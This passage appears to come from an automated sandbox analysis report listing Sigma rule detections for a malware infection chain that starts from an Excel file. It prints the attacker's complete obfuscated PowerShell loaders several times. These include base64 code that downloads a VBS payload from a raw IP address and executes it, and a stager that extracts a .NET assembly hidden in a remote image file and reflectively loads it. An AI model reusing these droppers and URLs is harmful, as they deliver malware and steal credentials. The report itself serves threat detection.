IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3556, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe, ProcessId: 3668, ProcessName: powershell.exe
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3556, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , ProcessId: 3860, ProcessName: wscript.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydElu
                  Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3556, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline", ProcessId: 3760, ProcessName: csc.exe
                  Sigma detected: Excel Network Connections
                  Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 150.136.81.248, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3184, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                  Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3556, TargetFilename: C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS
                  Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 1884, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi", ProcessId: 1052, ProcessName: RegAsm.exe
                  Sigma detected: Suspicious Office Outbound Connections
                  Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3184, Protocol: tcp, SourceIp: 150.136.81.248, SourceIsIpv6: false, SourcePort: 443
                  Sigma detected: Usage Of Web Request Commands And Cmdlets
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3556, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" , ProcessId: 3860, ProcessName: wscript.exe
                  Sigma detected: Dynamic CSharp Compile Artefact
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3556, TargetFilename: C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline
                  Sigma detected: Modification of IE Registry Settings
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3184, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[Ch